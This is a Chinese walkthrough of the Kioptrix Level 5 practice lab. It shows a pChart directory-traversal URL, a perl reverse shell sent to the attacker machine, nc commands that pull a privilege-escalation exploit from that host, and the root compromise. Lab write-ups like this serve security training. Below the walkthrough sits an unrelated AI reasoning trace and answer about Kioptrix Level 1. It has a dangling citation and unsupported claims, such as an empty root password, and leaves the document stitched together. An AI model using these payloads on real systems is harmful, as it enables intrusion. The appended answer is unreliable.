Kioptix Level 5(0基础教学)

1.将靶机导入至vm中

首先使用nmap命令获取靶机ip,靶机ip为192.168.55.135

2.进行端口扫描、目录枚举、指纹识别

指纹识别:

nmap 192.168.55.135 -p 22,80,8080 -sV -sC -O --version-all

3.进入靶机网页查看信息

访问靶机网页,发现没有有用的信息

查看一下源代码,发现有url,可以访问试一下

发现访问url后是一些目录

使用searchsploit进行漏洞查询,正好有一个漏洞版本号一致

将exp复制到桌面上查看exp的内容,发现是一个xss和目录遍历的漏洞

查看exp的漏洞利用方式

将目录进行拼接后,可以查看敏感信息

因为22端口是关闭的,所以passwd没有什么可利用的,读取shadow文件也读不了,想到8080端口报错是403,中间件是apache,所以就读取apache的配置文件看看,读取到的passwd文件得知了是FreeBSD 9.0的版本,所以就搜索 FreeBSD的apache配置路径后,构造payload:

http://192.168.55.135/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf

注:apache的配置文件目录:/usr/local/etc/apache22/httpd.conf

发现访问8080的端口需要使用User-Agent的版本为Mozilla/4.0 Mozilla4_browser

此时可以使用bp拦截改包也可以使用User-Agent Switcher and Manager插件改变UA头进行访问8080端口

此时可以访问8080端口

进去之后发现是这样子的,想访问还是得更改UA头

使用searchsploit进行查找历史漏洞,可以使用21665的exp(远程执行命令)

先将脚本下载到桌面上

打开exp查看使用方法

早期的FreeBSD内置perl环境,所以就用perl语言来反弹shell,在火狐插件中找到perl的反弹shell

将$i改为$i="192.168.55.129" $p改为$p=4444

kali监听4444端口

抓包然后修改请求包

注意:要将perl反弹shell的命令先进行url编码后再进行发包

成功反弹

以上信息收集得知系统版本号是9.0版本

得知靶机有nc

使用第一个exp,首先下载到桌面

然后将exp上传

靶机使用nc命令进行下载(刚刚的连接断了,此时是4444端口反弹的shell)

上传:nc -lvnp 8888 < 28718.c

下载:nc 192.168.55.129 8888 > 28718.c

将上传成功的文件编译,运行

成功提权!

<think>嗯,用户遇到了Kioptrix Level 1靶场扫描无响应的问题,用的是NAT模式。首先,我需要回想一下常见的原因。可能网络配置有问题,比如虚拟机的网络设置是否正确,是否处于同一网段。然后,用户可能没关闭防火墙或者靶机没正确启动服务。另外,扫描参数是否正确也很重要,比如nmap的参数是否合适。 我记得之前看过引用里的内容,用户用了nmap的-sn参数扫描,但可能没正确指定目标IP。需要确认靶场的IP地址是否在同一个子网下。有时候虚拟机使用NAT模式可能需要端口转发或者检查虚拟网络编辑器的设置,比如VMware的NAT设置是否有问题。 另外,用户提到靶场比较古老,可能Apache和服务的版本较低,是否兼容当前的环境?比如,是否因为服务未启动导致无法响应扫描。还要考虑主机防火墙是否阻止了连接,或者虚拟机的网络适配器是否正确连接。 可能的解决步骤包括:检查虚拟机网络配置,确认IP地址,使用正确的nmap参数(比如-p指定端口范围),关闭防火墙,重启服务等。此外,用户可能需要检查主机和虚拟机之间的连通性,比如ping测试,或者使用ARP扫描来发现靶机。 需要注意的是,有些情况下NAT模式可能需要手动设置静态IP,或者检查DHCP分配。如果扫描时没反应,可能是靶机没有获取到正确的IP,或者主机无法路由到靶机的网络。这时候可能需要检查虚拟网络设置,确保NAT网络配置正确,或者尝试桥接模式看看是否是NAT模式的问题。 还有,用户是否在扫描时使用了正确的目标网段?比如,如果主机在192.168.1.x,而靶机可能分配到了不同的子网,比如192.168.152.x,这时候需要调整扫描的IP范围。此外,nmap的--min-rate参数可能在高版本中需要调整,或者结合其他参数如-Pn来跳过主机发现。 总结下来,解决方案的步骤应该是:确认网络配置、检查IP地址、调整nmap参数、关闭防火墙、验证服务状态,如果不行再考虑更换网络模式或检查虚拟网络设置。</think>### Kioptrix Level 1靶场扫描无响应解决方案 #### 1. 验证网络配置 - **检查虚拟机网络模式**:确认靶机和攻击机(如Kali Linux)均设置为`NAT模式`,并在VMware/VirtualBox的虚拟网络编辑器中确保`NAT子网网段一致`(例如192.168.152.0/24)[^2] - **获取靶机IP**:在靶机启动后登录系统(默认账号`root`/空密码),执行`ifconfig`或`ip addr`获取实际分配的IP地址 #### 2. 优化扫描参数 ```bash nmap -sn 192.168.152.0/24 --min-rate 1000 # 快速扫描存活主机 nmap -Pn -p 1-65535 192.168.152.130 # 跳过主机发现,全端口扫描 ``` #### 3. 常见问题排查 | 问题类型 | 解决方案 | |---------|----------| | 防火墙拦截 | 靶机执行`service iptables stop`关闭防火墙 | | 服务未启动 | 检查`apache`状态:`service httpd status` | | ARP缓存问题 | 攻击机执行`arp-scan -l`扫描本地网络 | #### 4. 网络连通性验证 ```bash ping 靶机IP # 测试基础连通性 telnet 靶机IP 80 # 测试Web服务端口 tcpdump -i eth0 icmp # 抓包分析网络流量 ``` #### 5. 特殊场景处理 - **NAT模式失效**:尝试切换为`桥接模式`后重新扫描 - **DHCP未分配IP**:在VMware虚拟网络编辑器中重置NAT DHCP租约 - **虚拟机冲突**:关闭其他虚拟机避免IP冲突
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值